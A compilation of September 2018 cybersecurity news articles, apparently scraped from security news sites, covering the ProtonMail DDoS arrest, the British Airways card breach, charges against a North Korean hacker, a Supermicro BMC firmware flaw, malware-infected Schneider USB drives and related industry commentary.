Apple removed the popular app Adware Doctor because steals user browsing history




Opsec Mistakes Allowed U.S. to Link North Korean Man to Hacks




Police arrested Apophis Squad member responsible for ProtonMail DDoS attack




Privacy-oriented Linux OS Tails 3.9 is out, what’s new?




Researchers Discover New "Fallout" Exploit Kit




Russian citizen behind JPMorgan Chase and Dow Jones attacks has been extradited to US



U.K. Teen Involved in ProtonMail DDoS Attack Arrested
8.9.2018 securityweek Crime

ProtonMail has helped law enforcement identify one of the members of the Apophis Squad, a group that has made bomb threats and launched distributed denial-of-service (DDoS) attacks against many organizations.

The U.K. National Crime Agency (NCA) announced this week that a 19-year-old from Hertfordshire was arrested on August 31. The teen, George Duke-Cohan, remains in custody after he pleaded guilty to three counts of making hoax bomb threats.

Duke-Cohan is said to be the leader of Apophis Squad, which has sent bomb threats to thousands of schools in the United Kingdom and the United States. The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

While the charges in the U.K. focus on the hoax bomb threats, Apophis Squad is also known for launching DDoS attacks against encrypted email provider ProtonMail, cybersecurity journalist Brian Krebs, the DEF CON hacking conference, and government agencies in several countries. Its attacks and DDoS-for-hire services have apparently been inspired by the notorious Lizard Squad, whose members were also identified and charged by authorities.

ProtonMail reported in late June that it had been hit by a significant DDoS attack that caused some delays in the delivery of emails. The organization initially said a group linked to Russia had been behind the attack – Apophis Squad’s Twitter account claims the group is from Russia – but Radware, which helped ProtonMail mitigate the attack, later clarified that the attackers were actually based in the U.K.

In a blog post published on Thursday, ProtonMail Founder Andy Yen revealed that his organization helped authorities identify Duke-Cohan and other members of his group after learning that they had all been using ProtonMail.

It turns out that while Duke-Cohan and others claimed law enforcement would never be able to find them, they actually had poor operational security (opsec) practices and they even allowed their own servers to be breached.

Evidence collected from its own systems by ProtonMail and information from Brian Krebs helped identify Duke-Cohan as a member of Apophis Squad in the first week of August. However, British police only arrested him in late August after he threatened to make more bomb threats once school started in September.

The Twitter account used by Apophis Squad has not been active since August 31.

“We believe further charges are pending, along with possible extradition to the US,” Yen said.

ProtonMail aims to protect the privacy of its users, but warned that it does not protect individuals involved in criminal activities.

“That’s why we will investigate to the fullest extent possible anyone who attacks ProtonMail or uses our platform for crime. We will also cooperate with law enforcement agencies within the framework of Swiss law,” Yen said. “In recent weeks, we have further identified a number of other individuals engaged in attacks against ProtonMail, and we are working with the appropriate authorities to bring them to justice.”

Microsoft to Charge for Windows 7 Security Updates
8.9.2018 securityweek Security

Microsoft this week revealed plans to offer paid Windows 7 Extended Security Updates (ESU) for three years after traditional support for the operating system will officially end.

Released in 2009, Windows 7 currently powers around 39% of all machines running Microsoft’s Windows platform, but is slowly losing ground to Windows 10 (currently found on over 48% of Windows systems).

Microsoft stopped selling Windows 7 in 2014 (some variants are still available to OEMs) and ended mainstream support for the operating system in early 2015. The company plans on ending extended support for Windows 7 to January 14, 2020.

Past that date, organizations will have to pay in order to continue take advantage of support for the platform.

Paid Windows 7 Extended Security Updates (ESU), Microsoft now says, will be available through January 2023. The tech company will sell the Windows 7 ESU on a per-device basis and plans on increasing the price for it each year.

“Windows 7 ESUs will be available to all Windows 7 Professional and Windows 7 Enterprise customers in Volume Licensing, with a discount to customers with Windows software assurance, Windows 10 Enterprise or Windows 10 Education subscriptions,” Microsoft says.

The software giant also revealed that it will continue to provide support for Office 365 ProPlus on devices with active Windows 7 Extended Security Updates (ESU) through January 2023. This means that all those buying the Windows 7 ESU will continue to run Office 365 ProPlus.

January 2023, which is the end support date for Windows 8.1, also represents the end support date for Office 365 ProPlus on this platform version, Microsoft now reveals. Windows Server 2016, on the other hand, will offer support for Office 365 ProPlus until October 2025.

Currently, Microsoft is relying on a semi-annual schedule for Windows 10 and Office 365 ProPlus updates, targeting September and March, and the company will continue using this Windows 10 update cycle.

To make sure customers have enough time to plan for updates within their environments, however, Microsoft is making changes to the support life of Windows 10 updates.

Thus, currently supported feature updates of Windows 10 Enterprise and Education editions (versions 1607, 1703, 1709, and 1803) will be supported for 30 months from their original release date. As for future feature updates, those targeted for a September release will be supported for 30 months, while those targeted for a March release for 18 months.

According to Microsoft, all feature releases of Windows 10 Home, Windows 10 Pro, and Office 365 ProPlus will continue to be supported for 18 months, regardless of whether targeted for release in March or September.

BA Scrambles to Address Theft of Passenger Bank Details
8.9.2018 securityweek Incindent

British Airways will financially compensate customers whose data were stolen in a "sophisticated" and "malicious" hack, chief executive Alex Cruz said Friday as he apologised for the fiasco.

BA late Thursday revealed that personal and financial details of customers who booked flights on the group's website and mobile phone app between August 21 and Wednesday had been stolen.

The revelation comes just a few months after the European Union tightened data protection laws.

"We're extremely sorry for what has happened," Cruz told the BBC on Friday.

"There was a very sophisticated, malicious, criminal attack on our website."

BA took out full-page adverts in the UK newspapers on Friday to apologise to customers, while the share price of parent group IAG was down more than three percent in London deals.

"We are 100 percent committed to compensate them," Cruz said.

"We will compensate them for any financial hardship that they may have suffered," he told the broadcaster.

BA said it had launched an urgent investigation after realising that about 380,000 bank cards used to book its flights had been hacked.

The stolen data comprised customer names, postal addresses, email addresses and credit card information.

However the 15-day breach did not involve travel or passport details and has been fixed, the airline added.

- Regulators investigate -

"The moment we found out (Wednesday) that actual customer data had been compromised, that's when we began an all out immediate communication to our customers. That was our priority," Cruz said.

However Enza Iannopollo, privacy and security analyst at advisory group Forrester, said BA could have done better on informing those affected.

"If the timeline is confirmed and BA became aware of the breach on the evening of September 5th, then they have done their breach notification on time, which is of course a good thing," she said in a statement.

"However, customers are obviously not impressed about BA breach management at present. Some discovered it on social media, others reported wasting hours on the phone with their bank, everyone expects more from a company that truly cares about its customers."

"Terrible handling of the situation," tweeted one affected customer, Mat Thomas.

Iannopollo told AFP that it was too early to know whether BA would be fined over the affair.

"Regulators will assess the circumstances of this breach consistently with GDPR requirements," she said referring to the EU's General Data Protection Regulation that came into force in May.

Britain's National Crime Agency said it was assessing the matter, while the UK's data protection watchdog, the Information Commissioner's Office, will make its own enquiries.

"The ICO will do its assessment and investigation to determine whether to levy a fine or impose any enforcement action, but this will take some time and it might be that the regulator determines that rules were not breached," Iannopollo said.

About 1100 GMT, shares in IAG, which runs also Spanish carriers Iberia and Vueling as well as Irish airline Aer Lingus, were down 3.5 percent at 657.60 pence on London's benchmark FTSE 100 index, down 0.8 percent overall.

"Today's news is a reminder of just what a hot issue cyber security remains and the importance of companies having the right protections in place to mitigate the risk posed by attacks," noted Russ Mould, investment director at AJ Bell.

Malware on ICS Increasingly Comes From Internet: Kaspersky
8.9.2018 securityweek ICS

Kaspersky Lab products installed on industrial automation systems have detected over 19,000 malware samples in the first half of 2018, and the company has determined that the Internet is an increasingly significant source of attacks.

According to Kaspersky’s “Threat Landscape for Industrial Automation Systems” report for H1 2018, the company detected over 19,400 samples belonging to roughly 2,800 malware families. As expected, most of the attempts to infect industrial systems were part of random attacks rather than targeted operations.

An overall increase in malicious activity has led to attack attempts against 41.2% of the industrial control systems (ICS) protected by the security firm, which represents an increase of nearly 5 percentage points compared to the first half of 2017. Kaspersky detected 18,000 malware samples belonging to more than 2,500 families in that period.

Attacks were reported all around the world, but Asian, Latin American and North African countries had the highest percentage of attacked ICS computers, with up to 75% of devices targeted. In the United States, only 21.4% of industrial systems were targeted. Kaspersky noted that developed countries had recorded fewer attacks compared to ones with a low per capita GDP.

ICS attacks in H1 2018

A majority of the detected threats were Trojans using either Windows or web browsers as a platform.

“In H1 2018, threat actors continued to attack legitimate websites that had vulnerabilities in their web applications in order to host malware components on these websites,” Kaspersky said in its report. “Notably, the increase in the percentage of ICS computers attacked through browsers in H1 2018 was due to the increase in the number of attacks that involved JavaScript cryptocurrency miners. At the same time, the increase in the number of ICS computers attacked using Microsoft Office documents was associated with waves of phishing emails.”

The security firm determined that the Internet was the source in 27.3% of attacks, which represents an increase of nearly 7 percentage points compared to the same period of last year. Removable media accounted for 8.4% and email clients for 3.8% of attacks, with no significant changes compared to the prior period.

“This pattern seems logical: modern industrial networks can hardly be considered isolated from external systems. Today, an interface between the industrial network and the corporate network is needed both to control industrial processes and to provide administration for industrial networks and systems,” Kaspersky said.

Asia, Africa and Latin America are not only the most targeted, but they also represent the main sources of threats blocked by Kaspersky’s products.

Homeland Security Head: Colorado Tops US in Vote Security
8.9.2018 securityweek BigBrothers

Colorado, whose election systems are ranked among the nation's safest, held a cyber-security and disaster exercise Thursday for dozens of state, county and federal elections officials to reinforce the state's preparedness for, and public confidence in, November's midterm elections.

Participants included Department of Homeland Security cyber experts working with county elections clerks to confront a rapid-fire sequence of scenarios. In a brief appearance, Homeland Security Secretary Kristjen Nielsen praised Colorado as a national leader in safeguarding elections.

On Wednesday, Nielsen called election security one of the nation's highest priorities. She said the biggest threats are coming online from malicious nation-states seeking to disrupt democracy.

The U.S. intelligence community has said Russia had tried to influence the 2016 election to benefit President Donald Trump. Nielsen frequently has said the Russians attempted to sow discord and undermine faith in the democratic process and, over time, developed a preference for then-candidate Trump.

On Thursday, Nielsen reiterated her concerns about potential Russian hacking or interference, particularly of voter databases this year. But she said no attempts have been detected so far that match the scale of the 2016 effort.

"Any attempt to interfere in our elections is a direct attack on our democracy and is unacceptable," Nielsen told participants at a Denver hotel. Turning to Colorado's record, she declared: "We'd love to continue to use you as an example of what other states can adopt."

Among them, she said, her department wants all 50 states to conduct postelection risk-limiting audits, which strictly ensure the accuracy of vote counts, by 2020. It's standard practice in Colorado.

Colorado's Republican Secretary of State, Wayne Williams, said the exercise aimed to increase public confidence that votes are safe.

"So we can tell you that nobody in Russia, nobody in China, nobody anywhere else in the world can change a ballot in Colorado," Williams said.

Colorado was the only one among 21 targeted states to report to Homeland Security — not the other way around — that Russian interests attempted to hack into its systems in 2016, said state elections director Judd Choate.

It's invested in new vote tabulating machines and creates a separate paper trail of each ballot cast. Since 2013, it's required two-factor authentication for elections systems operators to access equipment. The secretary of state's office has more internet technology staff than purely elections-related staff, and it has plans, which Choate wouldn't disclose for security reasons, to guarantee security and privacy in the remote case the state's voter registration database is hacked.

This year, the state also will monitor Facebook, Twitter and Instagram starting well ahead of the election to detect and respond to false rumors about voting procedures, outages, and other voting problems. It also will collect intelligence on efforts to sway voters on social media, Choate said. He noted that Colorado's collaboration with Homeland Security is strong.

Choate warned the dozens of clerks, database experts and others that Thursday's exercise would be tough, involving, among a cascade of other problems, attempts to hack voter rolls, detect possible malware planted in voting systems weeks beforehand, phishing and responding to social media posts claiming systems were hacked or voters turned away. The exercise concerned both the weeks leading up to the election and election day itself.

"Like the worst possible election day and election that you've ever seen in your life. So there's every single disaster that you probably thought couldn't happen, and then about 15 that you wouldn't even thought through," Choate said.

Paul Huntsberger, database chief for Denver County's elections division, worked with colleagues from across the state responding or devising responses to the disaster scenarios: Def Con hackers in Las Vegas, electricity outages, security patches, verifying clearances and background checks for personnel, responding to ransomware attacks in other states.

Throughout, officials masquerading as citizens and news reporters demanded immediate answers to security questions.

"All of this is needed," Huntsberger said during a brief break. "And we're proving that communication, secure communication, is key to making it work."

Talking Global Cyberwar With Kaspersky Lab's Anton Shingarev
8.9.2018 securityweek CyberWar

Cyber War

Theory Suggests we Need to Come to the Very Brink of Cyberwar Before Humanity Backs Down and Finds a Solution

Security firms take a keen interest in the evolution of no-longer fanciful cyberwar -- they will be our first line of defense. Kaspersky Lab takes a particular interest, being both a defender and one of the first victims of this evolution. SecurityWeek spoke to Anton Shingarev, Kaspersky Lab's VP of public affairs.

First, we must understand where we currently stand. Discounting the rogue nations like North Korea and perhaps Iran (more on which later), there is no current cyberwar. There is intrusive surveillance and cyber espionage between potential adversaries -- but that has always been the case.

In May 1960 a U.S. high altitude spy plane was shot down by Russia while flying in Russian air space. That was very intrusive surveillance with a serious result -- but it did not lead to all-out kinetic warfare between the adversaries. The Cold War never became a Hot War (apart from what could be considered firefights in Korea and Vietnam) because of an intricate set of bi-lateral and international agreements.

We may have entered the early stages of a state of Cold Cyberwar, but Shingarev hopes and expects that the same type of bilateral and international cyber agreements will prevent a Hot Cyberwar developing and ultimately spilling into a full-scale kinetic war.

This won't prevent serious and damaging effects on the way. Just as the physical globe was balkanized into the major spheres of influence (the U.S. sphere, the Russian sphere, the so-called non-aligned group, and always on the outside, perhaps China), so too is the global internet being balkanized (and to a certain extent along similar geo-political lines).

Kaspersky Lab is a victim of this balkanization. Different regions are promoting local technology over global technology firms, and increasingly distrusting technologies they cannot control. At its worst, whole nations are firewalling themselves from the global internet -- such as China, Iran and North Korea. Even without such firewalls, individual nations place controls on foreign technologies.

Kaspersky Lab is an example. While not being prohibited from use by the people and commerce in general, it is increasingly excluded from western government agencies . There is no proof of wrongdoing, nor is any needed. It is simply a political effect of geo-political balkanization in an era of cold cyberwar. Nor is it one-sided. Other countries prohibit or limit foreign products, and many countries are demanding back doors into a range of communications products.

Right now, things seem to be getting worse. Across the globe, more than 30 countries have officially announced they have a military cyber-division, and verbal threats and counter threats are common. In May of this year, Air Marshall Phil Collins (Chief of Defence Intelligence, UK Ministry of Defence) made the case for pre-emptive cyber strikes without ruling out pre-emptive kinetic strikes. In the face of "continuous full spectrum competition and confrontation", he said the UK's response "should be to understand first, to decide first, and then if necessary to act first, across the physical and virtual, to secure decision advantage and then operational advantage, seeking swift yet controlled exploitation of vulnerabilities and the proactive denial of opportunities."

In the U.S., in August 2018, the Wall Street Journal reported that President Trump had reversed Obama-era rules on the deployment of cyber weapons -- effectively making it easier for the Pentagon to launch its own cyber-attacks. In October 2017, it was reported that the U.S. Cyber Command had launched a DDoS attack against North Korea's military spy agency, the Reconnaissance General Bureau (RGB).

But despite worsening global tensions, despite increasing balkanization and protectionism, despite Kaspersky Lab being an early victim of this Cold Cyberwar, Anton Shingarev remains hopeful that it can be contained and will not spill over into active kinetic warfare. He draws a parallel with the nuclear threat that came with the original Cold War.

Each side stockpiled nuclear weapons to threaten the other. "But once it was realized that use of these weapons would only guarantee mutual destruction, the world pulled back through bilateral and international agreements," he said. It hasn't rid the world of nuclear weapons, but they are now kept primarily as a deterrence, maintaining the threat of mutual destruction in order to keep the peace.

We haven't reached that stage in cyber yet. Nations are stockpiling cyber weapons in a threatening manner. There are no bilateral or international agreements (apart from existing international law) that will prevent a first or pre-emptive strike. We haven't yet reached the brink of mutual cyber destruction.

Shingarev has no confidence in current attempts to find an international solution. Microsoft has been to the forefront of these, first proposing international norms of behavior and then wrapping these into a call for a Cyber Geneva Convention. "Nothing has happened," said Shingarev -- and nothing is likely to happen. Microsoft is calling for international cyber disarmament, which is as likely as the decades-old calls for international nuclear disarmament.

Shingarev believes the way forward will come from bilateral agreements between the world's cyber superpowers, like the 1991 START (Strategic Arms Reduction Treaty) between the U.S. and Russia. Such agreements will be supported by mutual assistance treaties, like the UN and even NATO. These treaties will protect members from rogue countries who refuse to join a no cyber-strike agreement, or simply ignore it. In theory, it could mean that rogue states like North Korea and perhaps Iran would be punished by the rest of the world, while tiny nation states like Singapore would be protected from aggressors.

Such an approach has succeeded in preventing a nuclear war. Shingarev believes it could prevent an all-out cyberwar that could potentially spill into a kinetic war. But it is brinkmanship of the first order -- the theory suggests we need to come to the very brink of that cyberwar before humanity backs down and finds a solution.

Industry Reactions to U.S. Charging North Korean Hacker: Feedback Friday
8.9.2018 securityweek BigBrothers

A North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the notorious Lazarus Group.

Park Jin Hyok, 34, has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint made public on Thursday focuses on four of the hacker group’s operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Experts comment on U.S. charging Park Jin Hyok with hacking

Investigators have found several links between Park, the Lazarus Group and Chosun Expo Joint Venture, also known as Korea Expo Joint Venture (KEJV), a North Korean government front company allegedly used to support its cyber activities.

Industry professionals have commented on various aspects of the story, including Lazarus Group’s ongoing activities and the impact of the charges brought against Park.

And the feedback begins...

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“Why today? Even with the benefit of having served as a federal cybercrime prosecutor for almost 10 years, I’m struggling to understand why the DOJ unsealed this complaint today. There is no imminent activity, law enforcement or otherwise, that supports the unsealing right now. It seems intended only to “name and shame” Hyok and the North Korean Government, for actions that the US Government has already publicly attributed to North Korea.

Why a complaint, instead of a grand jury indictment? The manner of charging Hyok is odd. This is a criminal complaint; not an indictment. Complaints are used to charge people quickly when they have been arrested or are facing imminent arrest. Generally, the DOJ has been using “name and shame” indictments against cybercrime agents of foreign governments. Because Mr. Hyok has not been arrested and is unlikely to ever see the inside of the US courtroom, the use of a complaint here is odd.

I think this indictment will have little tangible impact on Mr. Hyok, unless he is an avid international traveler. He is unlikely to face arrest unless he travels to a country that cooperates with US law enforcement or has an extradition treaty with the United States. It is also unlikely to have little impact on North Korea, which will almost certainly deny the allegations. The US Government has already accused North Korea of being linked to these criminal actions, so charging one individual who will never face prosecution seems to be of limited value, at best.

There’s also a potential downside to US law enforcement in publicizing this level of detail about the methodology behind cyber investigations and the sources and types of evidence used to attribute cybercriminal activity to a particular individual. The affidavit shows how capable our law enforcement agencies are in tracking cyber bread crumbs and connecting digital dots. However, the affidavit almost certainly will be studied by cybercriminals and nation state actors on how to improve their own operational security and avoid detection in the future. In my view, that potential cost outweighs the benefit of disclosure in this case.”

Eric Chien, technical director, Symantec Security Response:

“What’s perhaps most interesting about the DOJ indictment is that law enforcement was able to identify Park Jin Hyok as part of the Lazarus group by obtaining emails from his Hotmail and Gmail accounts. Surprisingly, Park used the same email accounts for the legitimate software development work, as well as hacking activity attributed to Lazarus. Park’s resume and image were discovered in his email, which helped law enforcement attribute the hacking activity back to him specifically.

We’ll likely see Lazarus move away from these free email services, given they’ll have to re-tool their entire infrastructure, including email accounts, passwords, servers, etc. now that they know they’re being watched. Lately, the group’s main focus has been on cryptocurrency – most of the attacks from the past year that we believe are related to Lazarus have targeted crypto-related victims (i.e. ICO providers, cryptocurrency banks, mining pool providers, etc.). It’s unlikely that this indictment will stop the group entirely – judging from their history, such as the Sony breach and WannaCry, they’re brazen and not scared of getting caught.”

Benjamin Read, senior manager, cyber espionage analysis, FireEye:

“The US Department of Justice’s criminal complaint describing a North Korean national’s role in a wide range of intrusion activity is consistent with FireEye’s analysis of both the scope and attribution of this activity, which we link to the group TEMP.Hermit. While we do not have insight into all of the incidents described in the complaint, our analysis concurs with the conclusion that the actors responsible for multiple financially motivated intrusions, the WannaCry ransomware and many of the other incidents are linked by shared development resources. FireEye has observed these malicious operations continuing at a high pace over the last two years and impacting numerous organizations.

FireEye assisted the US Government with analysis of malware provided by the Department of Justice in support of this effort; however, we cannot comment on the specifics of that analysis. Our company assessments are made based only on data we have independently obtained through Mandiant incident response, FireEye devices and other sources.”

Sherrod DeGrippo, director of threat research and detection, Proofpoint:

The Lazarus group is still very active. Most recently we profiled the financially motivated arm of the organization and their work targeting South Korean point-of-sale infrastructure and, separately, cryptocurrency wallets and exchanges. The Lazarus Group also includes both disruption and espionage arms engaged in ongoing efforts worldwide.

Mukul Kumar, Chief Information Security Officer and VP of Cyber Practice, Cavirin:

“Though the Sony Breach hasn’t been in the news for a while, the charges prove that we’re getting better at identifying the ultimate sources of breaches. This of course also applies to non state-sponsored hackers, who may have believed that they could not be tracked.”

Bill Conner, CEO, SonicWall:

“The Sony breach and WannaCry ransomware attacks are milestones for those in the IT industry, as they mark a day we’ll never forget and a distinct moment when the cyber war was brought to the attention of those who were unsuspecting to it. Law enforcement agencies and government officials around the world are challenged by the internet’s invisible boarders and its nameless perpetrators when it comes to pursuing or charging cyber criminals. While almost four years have passed since the communications giant sent notifications of its attacks, the U.S. Justice Department’s actions are commendable and should serve as a reminder for consumers and organizations alike to remain vigilant.

In today’s connected world, it is irresponsible to operate online without strict security standards. Total end-to-end security is key, including a layered approach to security across wired, wireless, mobile and cloud networks, as well as the securing IoT devices to prevent tampering and unauthorized access.”

David Maxwell, Senior Fellow, FDD:

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm.

The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea.

It is also important the American public knows its government is going after these threats and will relentlessly pursue the perpetrators of cyber attacks.

It is especially important the U.S. goes after North Korea's cyber capabilities because Pyongyang is relying on illicit activities for funding and, ultimately, to support regime survival. Cyber provides the regime with a broad range of capabilities: from stealing funds, to espionage, to influencing social media information, to hacking enemies, and to attacking infrastructure. In many ways, cyber is much more practical and valuable than nuclear weapons.

This supports continued maximum pressure on North Korea, as cyber activities help the regime generate revenue through other means that have been stopped because of sanctions.”

Dmitri Alperovitch, CTO and co-founder of CrowdStrike:

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today. Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.

One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice.”

Flaw in update process for BMCs in Supermicro servers allows to deliver persistent malware or brick the server
7.9.2018 securityaffairs

A team of security researchers discovered a vulnerability in the baseboard management controller (BMC) hardware used by Supermicro servers.
Researchers from security firm Eclypsium have discovered a vulnerability in the firmware update mechanism that could be exploited by hackers to deliver persistent malware, completely wipe and reinstall of the operating system.

“Using the vulnerabilities we discovered, it is possible to make arbitrary modifications to the BMC code and data. Using these modifications, an attacker can run malicious software within these highly privileged management controllers. This could be useful, for example, to survive operating system reinstallation or communicate covertly with the attacker’s infrastructure, similar to the PLATINUM malware that used manageability features to bypass detection.” reads the advisory published by the expert.

“Alternatively, this vulnerability could be used to “brick” (permanently disable) the BMC or the entire system, creating an impact even more severe than the BlackEnergy KillDisk component.”

Supermicro server BMCs

The Baseboard Management Controllers (BMCs) are part of the server motherboard and are used to directly control and manage the various hardware components of the system. It could be used to repair or reinstall the system software and it could be remotely controlled by administrators.

The BMCs are a privileged target of hackers because they operate at low level, below the level of the host OS and system firmware.

Experts discovered that the update mechanism doesn’t implement a code signing verification mechanism either check if the firmware is downloaded from a legitimate source.

The exploitation of the flaw could allow attackers to run malicious code that is transparent to OS-level antimalware solutions.

The attack scenario sees hackers in a position to carry out man-in-the-middle attacks, this means that they have to be able to access the traffic during the update process.

“Our research has uncovered vulnerabilities in the way that multiple vendors update their BMC firmware. These vendors typically leverage standard, off-the-shelf IPMI management tools instead of developing customized in-house management capabilities.” continues the analysis.

“In this case, we will go deep into the BMC update process on Supermicro systems, we found that the BMC code responsible for processing and applying firmware updates does not perform cryptographic signature verification on the provided firmware image before accepting the update and committing it to non-volatile storage. This effectively allows the attacker to load modified code onto the BMC.

The researchers highlighted that attackers could exploit the flaw to permanently brick the BMC or the entire server.

“Because IPMI communications can be performed over the BMC LAN interface, this update mechanism could also be exploited remotely if the attacker has been able to capture the admin password for the BMC,” Eclypsium added.

“This requires access to the systems management network, which should be isolated and protected from the production network. However, the implicit trust of management networks and interfaces may generate a false sense of security, leading to otherwise-diligent administrators practicing password reuse for convenience.”

The researchers have reported the flaw Supermicro that addressed it by implementing signature verification to the firmware update tool.

British Airways hacked, attackers stole details of 380,000 customers
7.9.2018 securityaffairs Incindent

Personal and payment card information of 380,000 British Airways customers were stolen by attackers, stolen data did not include travel or passport details.
British Airways was hacked, customer personal and payment card information of 380,000 were stolen by attackers, the stolen data did not include travel or passport details.

The company published a data breach notification on its website, the security breach affected customers making bookings on its website and app from 22:58 BST August 21 2018 until 21:45 BST September 5 2018 inclusive.

British Airways has launched an internal investigation and notified the police and relevant authorities.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details.” reads the data breach notification.

“From 22:58 BST August 21 2018 until 21:45 BST September 5 2018 inclusive, the personal and financial details of customers making bookings on our website and app were compromised.”

The airline confirmed that the breach has been resolved and its services are now working normally. British Airways is communicating with affected customers and is recommending customers who believe they may have been affected by the breach to contact their banks or credit card providers.

A spokesperson told the TechCrunch website that “around 380,000 card payments” were stolen.

“We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously.” said Alex Cruz, British Airways’ chairman and chief executive.

Privacy advocated and security experts believe the company could face severe fines due to the new European GDPR data protection laws.

In March 2015, British Airways Executive Club member accounts were hacked, it wasn’t a data breach because hackers used credentials available in the underground.

USB Drives shipped with Schneider Solar Products were infected with malware
7.9.2018 securityaffairs

Schneider Electric announced that some of the USB drives it has shipped with its Conext ComBox and Conext Battery Monitor products were infected with malware.
Schneider Electric has found a malicious code on the USB drives that have been shipped with Conext ComBox and Conext Battery Monitor products.

Both products are part of the solar energy offering of the vendor. ComBox is a communications and monitoring device for installers and operators of Conext solar systems. Conext Battery Monitor indicates hours of battery based runtime and determines battery bank state of charge.

The tainted drives have been shipped with all versions of Conext ComBox (sku 865-1058) and all versions of Conext Battery Monitor (sku 865-1080-01).

Schneider revealed that the USB drives were infected with a malware during manufacturing at a third-party supplier’s facility.

“Schneider Electric is aware that USB removable media shipped with the Conext Combox and Conext Battery Monitor products may have been exposed to malware during manufacturing at a third-party supplier’s facility.” reads the security advisory published by the company.

Schneider Electric USB Drives

The good news for customers is that the malware that was found on the USB drives was easy to detect for almost any anti-virus software, anyway the company is recommending customers to not to use them and “securely discard” the infected devices.

“Schneider Electric has confirmed that the malware should be detected and blocked by all major anti-malware programs. Out of caution, Schneider Electric recommends that these USB removable media are not used.” continues the advisory.

“These USB removable media contain user documentation and non-essential software utilities. They do not contain any operational software and are not required for the installation, commissioning, or operation of the products mentioned above. This issue has no impact on the operation or security of the Conext Combox or Conext Battery Monitor products,”

Users who believe they may have used the infected USB drives must scan their system for the presence of the malicious code.

At the time it is not clear the extent of the incident, anyway, this case is just the latest in a series of supply chain attacks observed in the last years.

We reported several cases of pre-installed malware and also cases quite similar to this one, like the one that involved last year IBM Storwize shipped with infected initialization USB drives.

US charges North Korea agent over Sony Pictures hack and WannaCry
7.9.2018 securityaffairs CyberCrime

The U.S. Department of Justice charged a North Korea agent over WannaCry and 2014 Sony Pictures Entertainment Hack.
The U.S. Department of Justice announces charges against a North Korean government spy that was involved in the massive WannaCry ransomware attack and the 2014 Sony Pictures Entertainment hack.

“the Justice Department charged on Thursday in a 174-page criminal complaint that detailed how hackers caused hundreds of millions of dollars’ worth of damage to the global economy.” states the NYT.

“Only one North Korean, Park Jin-hyok, was named — charged with computer fraud and wire fraud in the 2014 hack of Sony Pictures Entertainment.”

north korea sony hack-3

The individual charged by the US DoJ is Park Jin Hyok, an expert that works for North Korean military intelligence agency Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT Group.

The complaint against Mr. Park was filed under seal on June 8, just a few days before the summit meeting between Trump and Mr. Kim in Singapore.

The complaint also reports of a hacking unit working for North Korea’s intelligence agency, that operates out of China and other Asian nations
The 2014 Sony Pictures Entertainment hack was carried out by Pyongyang in retaliation for the production of the comedic film “The Interview” that mocks the North Korean leader Kim Jong Un.

At the time, the US law enforcement suspected the involvement of North Korea’s Unit 121, which is the group of hackers working under the direction of the General Bureau of Reconnaissance.

North Korea sony hack

Hackers wiped many computers from the company and exfiltrated over 200GB of sensitive data, including upcoming movie scripts, celebrities phone numbers, employees data versions of then-unreleased films.
WannaCry infected 200,000 computers across 150 countries in a matter of hours after the beginning of the massive attack, it took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present inside the earlier versions of Microsoft Windows. This tool was soon stolen by a hacking group named “Shadow Brokers” which leaked it to the world in April 2017.

The ransomware infected systems in any industry and also targeted critical infrastructures such as hospitals and banks.

The US intelligence highlighted that North Korea hackers were free to operate from Chine. Chosun Expo Joint Venture helped fund North Korean hacking groups by covering their activities with legitimate programming work from an office in Dalian, China. According to the complaint, some customers were aware the employees “were North Korean computer programmers connected to the government.”
Mr. Park, who worked there from 2011 to 2013, and his colleagues were overseen by a company manager and North Korean political attaché́, the Justice Department said.

Hyok worked in China from at least 2011 to 2013 and returned to North Korea shortly before the attack against Sony Pictures in November 2014.

The investigation is still ongoing, this kind of investigations are very difficult and cannot leverage classified information from the intelligence agencies

“In order to get admissible evidence,” John Carlin, the former head of the Justice Department’s National Security Division, “prosecutors have to work through any issues the intelligence community might have.”

British Airways Hacked With Details of 380,000 Cards Stolen
7.9.2018 securityweek Incindent

British Airways said Thursday that the personal and financial details of customers making bookings between August 21 and September 5 were stolen in a data breach involving 380,000 bank cards.

"We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details," the airline said in a statement.

"The personal and financial details of customers making bookings on our website and app were compromised," it said.

"The breach has been resolved and our website is working normally. We have notified the police and relevant authorities.

"We are deeply sorry for the disruption that this criminal activity has caused."

BA said the breach took place between 2158 GMT on August 21 and 2045 GMT on September 5.

Around 380,000 payment cards were compromised.

BA advised anyone who believed they may have been affected to contact their bank or credit card provider and follow their recommendations.

As for compensation, BA said: "We will be contacting customers and will manage any claims on an individual basis."

It said customers due to travel could check in online as normal as the incident had been resolved.

The National Crime Agency said: "We are aware of reports of a data breach affecting British Airways and are working with partners to assess the best course of action."

